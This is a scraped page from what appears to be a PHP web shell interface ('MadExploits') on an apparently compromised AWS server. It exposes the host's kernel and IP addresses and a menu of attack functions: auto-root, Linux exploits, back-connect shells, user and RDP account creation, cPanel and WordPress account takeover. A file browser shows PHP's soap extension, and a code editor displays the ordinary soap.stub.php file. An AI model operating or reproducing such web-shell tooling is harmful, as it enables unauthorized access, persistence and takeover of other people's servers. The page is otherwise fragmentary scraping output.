Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.118.173.146
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
80 /
src /
ext /
soap /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
CREDITS
51
B
-rw-r--r--
config.m4
560
B
-rw-r--r--
config.w32
729
B
-rw-r--r--
php_encoding.c
109.45
KB
-rw-r--r--
php_encoding.h
7.37
KB
-rw-r--r--
php_http.c
50.27
KB
-rw-r--r--
php_http.h
1.85
KB
-rw-r--r--
php_packet_soap.c
12.44
KB
-rw-r--r--
php_packet_soap.h
1.31
KB
-rw-r--r--
php_schema.c
76.58
KB
-rw-r--r--
php_schema.h
1.89
KB
-rw-r--r--
php_sdl.c
107.02
KB
-rw-r--r--
php_sdl.h
7.79
KB
-rw-r--r--
php_soap.h
6.22
KB
-rw-r--r--
php_xml.c
7.42
KB
-rw-r--r--
php_xml.h
3.13
KB
-rw-r--r--
soap.c
147.02
KB
-rw-r--r--
soap.stub.php
3.04
KB
-rw-r--r--
soap_arginfo.h
9.9
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : soap.stub.php
<?php /** @generate-function-entries */ function use_soap_error_handler(bool $enable = true): bool {} function is_soap_fault(mixed $object): bool {} class SoapParam { public function __construct(mixed $data, string $name) {} } class SoapHeader { public function __construct(string $namespace, string $name, mixed $data = UNKNOWN, bool $mustUnderstand = false, string|int|null $actor = null) {} } class SoapFault extends Exception { public function __construct(array|string|null $code, string $string, ?string $actor = null, mixed $details = null, ?string $name = null, mixed $headerFault = null) {} public function __toString(): string {} } class SoapVar { public function __construct(mixed $data, ?int $encoding, ?string $typeName = null, ?string $typeNamespace = null, ?string $nodeName = null, ?string $nodeNamespace = null) {} } class SoapServer { public function __construct(?string $wsdl, array $options = []) {} /** @return void */ public function fault(string $code, string $string, string $actor = "", mixed $details = null, string $name = "") {} /** @return void */ public function addSoapHeader(SoapHeader $header) {} /** @return void */ public function setPersistence(int $mode) {} /** @return void */ public function setClass(string $class, mixed ...$args) {} /** @return void */ public function setObject(object $object) {} /** @return array */ public function getFunctions() {} /** * @param array|string|int $functions * @return void */ public function addFunction($functions) {} /** @return void */ public function handle(?string $request = null) {} } class SoapClient { public function __construct(?string $wsdl, array $options = []) {} /** @return mixed */ public function __call(string $name, array $args) {} /** * @param SoapHeader|array|null $inputHeaders * @param array $outputHeaders * @return mixed */ public function __soapCall(string $name, array $args, ?array $options = null, $inputHeaders = null, &$outputHeaders = null) {} /** @return array|null */ public function __getFunctions() {} /** @return array|null */ public function __getTypes() {} /** @return string|null */ public function __getLastRequest() {} /** @return string|null */ public function __getLastResponse() {} /** @return string|null */ public function __getLastRequestHeaders() {} /** @return string|null */ public function __getLastResponseHeaders() {} /** @return string|null */ public function __doRequest(string $request, string $location, string $action, int $version, bool $oneWay = false) {} /** @return void */ public function __setCookie(string $name, ?string $value = null) {} /** @return array */ public function __getCookies() {} /** * @param SoapHeader|array|null $headers * @return bool */ public function __setSoapHeaders($headers = null) {} /** @return string|null */ public function __setLocation(?string $location = null) {} }
Close